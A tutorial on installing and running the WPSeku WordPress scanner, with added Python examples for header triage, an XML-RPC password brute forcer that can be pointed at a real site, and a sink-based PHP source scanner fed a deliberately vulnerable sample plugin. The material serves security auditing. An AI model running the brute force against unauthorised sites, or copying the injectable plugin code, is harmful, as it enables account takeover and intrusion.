WPSeku – WordPress Security Scanner
In a previous article we looked at WAScan, an excellent tool for auditing the security of our web applications.
Today, from the same developer (m4ll0k), I present the security scanner he has built: WPSeku.
WPSeku is a variant of WAScan aimed exclusively at checking the security of a site or environment running WordPress. Its advantage is that we can scan our remote WordPress installations and identify their security problems.
Installation and use are simple; let's go through them.
Installing WPSeku – WordPress Security Scanner
Clone the repo.
git clone https://github.com/m4ll0k/WPSeku.git wpseku
Go into the directory.
cd wpseku
Install the dependencies (the tool is Python 3, so use pip3).
pip3 install -r requirements.txt
If a message similar to this one appears…
You are using pip version 9.0.1, however version 9.0.3 is available.
update pip. Use pip3 here as well, so that you upgrade the same pip that installed the requirements and not the Python 2 one:
pip3 install --upgrade pip
As you can see, installation is quick; on to usage.
Using WPSeku – WordPress Security Scanner
The base command is:
python3 wpseku.py
Of course, the command above does not scan any URL, so we add options to make it examine a site.
Note that in this example the command is not particularly intrusive and does not apply brute force.
python3 wpseku.py --url https://www.tusitio.com --verbose
Example output…
—————————————-
_ _ _ ___ ___ ___| |_ _ _
| | | | . |_ -| -_| '_| | |
|_____| _|___|___|_,_|___|
|_| v0.4.0
WPSeku – WordPress Security Scanner
by Momo Outaadi (m4ll0k)
—————————————-
[ + ] Target: https://www.tusitioweb.com
[ + ] Starting: 10:38:47
[ + ] Server: nginx
[ + ] Uncommon header "content-type" found, with contents: text/html; charset=UTF-8
[ + ] Uncommon header "date" found, with contents: Thu, 05 Apr 2018 07:38:47 GMT
[ + ] Uncommon header "connection" found, with contents: keep-alive
[ + ] Uncommon header "last-modified" found, with contents: Tue, 03 Apr 2018 10:14:30 GMT
[ + ] Uncommon header "x-powered-by" found, with contents: PHP/7.2.4
[ + ] Uncommon header "content-length" found, with contents: 10038
[ + ] Uncommon header "keep-alive" found, with contents: timeout=60
[ + ] Uncommon header "server" found, with contents: nginx
[ + ] Uncommon header "cache-control" found, with contents: max-age=0
[ + ] Uncommon header "content-encoding" found, with contents: gzip
[ + ] Uncommon header "expires" found, with contents: Thu, 05 Apr 2018 07:38:47 GMT
[ + ] Uncommon header "vary" found, with contents: Accept-Encoding
…
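The scanner flags every header it does not recognise, so most of that list is noise. What actually matters from a security point of view is which headers give away the stack (here "server: nginx" and "x-powered-by: PHP/7.2.4", the second with an exact version) and which hardening headers are absent. The script below is an added example, not part of WPSeku; it parses the headers shown in the output above (constructed here as a "name: value" text block) and reports both. The lists of disclosure headers and expected hardening headers are this example's own choices.

```python
"""Triage of response headers like the ones WPSeku lists above.

Added example, not WPSeku's code. SAMPLE_HEADERS is constructed from the
sample scan output on this page; LEAKY and EXPECTED are this example's own
(assumed) lists.
"""
import re

# Constructed from the scan output above, one "name: value" per line.
SAMPLE_HEADERS = """\
content-type: text/html; charset=UTF-8
date: Thu, 05 Apr 2018 07:38:47 GMT
connection: keep-alive
last-modified: Tue, 03 Apr 2018 10:14:30 GMT
x-powered-by: PHP/7.2.4
content-length: 10038
keep-alive: timeout=60
server: nginx
cache-control: max-age=0
content-encoding: gzip
expires: Thu, 05 Apr 2018 07:38:47 GMT
vary: Accept-Encoding
"""

# Headers that tell a visitor which software serves the site (assumed list).
LEAKY = ("server", "x-powered-by", "x-generator", "x-aspnet-version")

# Hardening headers a WordPress front end should normally send (assumed list).
EXPECTED = (
    "strict-transport-security",
    "x-content-type-options",
    "x-frame-options",
    "content-security-policy",
)

# "7.2.4" or "1.14": a version number inside a header value.
VERSION_RE = re.compile(r"\d+\.\d+(\.\d+)?")


def parse_headers(raw):
    """Turn 'name: value' lines into a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def triage(headers):
    """Return (leaks, missing).

    leaks:   (header, value, carries_exact_version) for each LEAKY header present
    missing: EXPECTED headers the response does not send, in EXPECTED order
    """
    leaks = [
        (name, headers[name], bool(VERSION_RE.search(headers[name])))
        for name in LEAKY
        if name in headers
    ]
    missing = [name for name in EXPECTED if name not in headers]
    return leaks, missing


if __name__ == "__main__":
    leaks, missing = triage(parse_headers(SAMPLE_HEADERS))
    for name, value, versioned in leaks:
        flag = "  (exact version disclosed)" if versioned else ""
        print(f"disclosure: {name}: {value}{flag}")
    for name in missing:
        print(f"missing:    {name}")
```

On nginx, server_tokens off; removes the version from the Server header, and expose_php = Off in php.ini stops PHP from sending X-Powered-By at all. Neither replaces the hardening headers, which you add in the server block or through a security plugin.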
You can also test the strength of your password by supplying a wordlist.
python3 wpseku.py --url https://www.tusitio.com --brute --user prueba --wordlist wl.txt --verbose
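To see what that brute force actually does on the wire, here is an added example (not WPSeku's own code). It assumes the login attempts go through xmlrpc.php with the wp.getUsersBlogs method, the usual route for WordPress brute forcers because it needs no cookie or nonce; the two sample responses are constructed with the same library rather than captured from a site, the username "prueba" and the password "prueba123" are made up, and send is an injectable function so the example runs offline.

```python
"""What a WordPress XML-RPC login brute force sends and receives.

Added example, not WPSeku's code. Assumes the brute force uses
xmlrpc.php / wp.getUsersBlogs. Responses below are constructed here.
"""
import xmlrpc.client


def login_request(user, password):
    """Body of the POST to /xmlrpc.php that tests one credential pair."""
    return xmlrpc.client.dumps((user, password), methodname="wp.getUsersBlogs")


def classify(response_body):
    """Return 'valid', 'invalid' or 'blocked' for one XML-RPC response body.

    WordPress answers a wrong pair with faultCode 403 ("Incorrect username or
    password."). A fault with any other code, e.g. 405 when XML-RPC is disabled
    by a plugin, is reported as 'blocked' so the loop stops instead of burning
    the rest of the wordlist against a closed door. Any non-fault response
    means the method ran, which requires a successful login.
    """
    try:
        xmlrpc.client.loads(response_body)
    except xmlrpc.client.Fault as fault:
        return "invalid" if fault.faultCode == 403 else "blocked"
    return "valid"


def brute(user, wordlist, send):
    """Try each password in order; send(body) -> response body does the POST.

    Returns the password that worked, or None (not found, or blocked).
    """
    for password in wordlist:
        verdict = classify(send(login_request(user, password)))
        if verdict == "valid":
            return password
        if verdict == "blocked":
            return None
    return None


# --- constructed sample responses (not captured from a real site) ---------
FAIL_RESPONSE = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."))
BLOCKED_RESPONSE = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."))
OK_RESPONSE = xmlrpc.client.dumps(
    ([{"blogid": "1", "blogName": "tusitio", "url": "https://www.tusitio.com/",
       "xmlrpc": "https://www.tusitio.com/xmlrpc.php", "isAdmin": True}],),
    methodresponse=True)


def fake_send(body):
    """Offline stand-in for POST /xmlrpc.php: only prueba/prueba123 is accepted."""
    params, method = xmlrpc.client.loads(body)
    if method != "wp.getUsersBlogs":
        return BLOCKED_RESPONSE
    return OK_RESPONSE if params == ("prueba", "prueba123") else FAIL_RESPONSE


if __name__ == "__main__":
    # Constructed mini wordlist standing in for wl.txt.
    wordlist = ["123456", "password", "prueba123", "qwerty"]
    print("found:", brute("prueba", wordlist, fake_send))
```

Against a real target send would be something like lambda body: requests.post(f"{url}/xmlrpc.php", data=body, timeout=10).text. On the defending side the same traffic appears as a burst of POST requests to /xmlrpc.php from one address in the access log, which is what you alert on.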
Now we check the WordPress code itself, the plugins and the templates (themes) from a local copy of the files.
python3 wpseku.py --scan <dir/file> --verbose
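A source scan of this kind is, at bottom, a search for dangerous PHP sinks that receive request-controlled input. The following is an added example and not WPSeku's rule set: it assumes a small list of sinks and the PHP superglobals as sources, works line by line (no taint tracking, so a flow split across two lines is only reported as low), and scans a plugin file constructed inline for the demonstration.

```python
"""A minimal plugin/theme source scan of the kind --scan <dir/file> performs.

Added example, not WPSeku's rules. SINKS and SOURCES are this example's own
assumptions; SAMPLE_PLUGIN is constructed for the demonstration.
"""
import re
import tempfile
from pathlib import Path

# Superglobals carrying attacker-controlled data (assumed list).
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")

# Sink name -> impact (assumed, illustrative list).
SINKS = {
    "eval": "code execution",
    "system": "command execution",
    "exec": "command execution",
    "shell_exec": "command execution",
    "passthru": "command execution",
    "unserialize": "object injection",
    "include": "file inclusion",
    "require": "file inclusion",
    "include_once": "file inclusion",
    "require_once": "file inclusion",
    "file_get_contents": "file read / SSRF",
    "move_uploaded_file": "arbitrary upload",
}
SINK_RE = re.compile(r"\b(" + "|".join(map(re.escape, SINKS)) + r")\b")

# Constructed plugin file: one split flow, one direct flow, one safe sink.
SAMPLE_PLUGIN = """\
<?php
/* Plugin Name: Demo plugin (constructed for this example) */
$page = $_GET['page'];
include $page . '.php';                       // LFI, but the source is on the line above
$out = shell_exec('ls ' . $_REQUEST['dir']);  // command injection on one line
$cfg = unserialize(get_option('demo_cfg'));   // sink fed from the database, not the request
echo esc_html($_GET['msg']);                  // request data but no sink: not reported
"""


def scan_source(code, name="<string>"):
    """Return findings as (file, line, sink, severity).

    severity is 'high' when a sink and a request source share the line,
    'low' when only the sink is present. Trailing // comments are ignored
    (naively: a // inside a string would also cut the line).
    """
    findings = []
    for lineno, line in enumerate(code.splitlines(), 1):
        stripped = line.split("//", 1)[0]
        match = SINK_RE.search(stripped)
        if not match:
            continue
        severity = "high" if SOURCE_RE.search(stripped) else "low"
        findings.append((name, lineno, match.group(1), severity))
    return findings


def scan_path(path):
    """Scan one .php file, or every .php file under a directory."""
    path = Path(path)
    files = [path] if path.is_file() else sorted(path.rglob("*.php"))
    findings = []
    for php_file in files:
        findings.extend(scan_source(php_file.read_text(errors="replace"), str(php_file)))
    return findings


def demo_scan():
    """Write the constructed plugin to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "demo.php").write_text(SAMPLE_PLUGIN)
        return [(Path(f).name, line, sink, sev) for f, line, sink, sev in scan_path(tmp)]


if __name__ == "__main__":
    for name, line, sink, sev in demo_scan():
        print(f"{sev:4}  {name}:{line}  {sink}()  [{SINKS[sink]}]")
```

Point scan_path at wp-content/plugins or a single theme file to run it over real code; treat every "high" as something to read by hand, and remember that "low" includes the split flows a line-based scan cannot follow.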
As you can see, there are plenty of possibilities. Note, however, that the argument reference reproduced below is WPScan's help text (it names WPScan and the Ruby Typhoeus library), not WPSeku's: WPSeku's own options are the ones used in the commands above (--url, --brute, --user, --wordlist, --scan, --verbose), and python3 wpseku.py --help prints its current list. WPScan's arguments, for reference:
--update Update the database to the latest version.
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
--exclude-content-based "<regexp or string>"
Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file | -c <config file> Use the specified config file, see the example.conf.json.
--user-agent | -a <User-Agent> Use the specified User-Agent.
--cookie <string> String to read cookies from.
--random-agent | -r Use a random User-Agent.
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch Never ask for user input, use the default behaviour.
--no-color Do not use colors in the output.
--log [filename] Creates a log.txt file with WPScan's output if no filename is supplied. Otherwise the filename is used for logging.
--no-banner Prevents the WPScan banner from being displayed.
--disable-accept-header Prevents WPScan sending the Accept HTTP header.
--disable-referer Prevents setting the Referer header.
--disable-tls-checks Disables SSL/TLS certificate verification.
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it.
Subdirectories are allowed.
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory.
If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
If no protocol is given (format host:port), HTTP will be used.
--proxy-auth <username:password> Supply the proxy login credentials.
--basic-auth <username:password> Set the HTTP Basic authentication.
--wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
If the "-" option is supplied, the wordlist is expected via STDIN.
--username | -U <username> Only brute force the supplied username.
--usernames <path-to-file> Only brute force the usernames from the file.
--cache-dir <cache-directory> Set the cache directory.
--cache-ttl <cache-ttl> Typhoeus cache TTL.
--request-timeout <request-timeout> Request Timeout.
--connect-timeout <connect-timeout> Connect Timeout.
--threads | -t <number of threads> The number of threads to use when multi-threading requests.
--throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
--help | -h This help screen.
--verbose | -v Verbose output.
--version Output the current version and exit.
I recommend you visit this page, where you can keep up to date with all the vulnerabilities found in WordPress, as well as in its plugins and templates.
Remember that this security scanner is for private use, and only against systems that are your own or that you are authorised to test.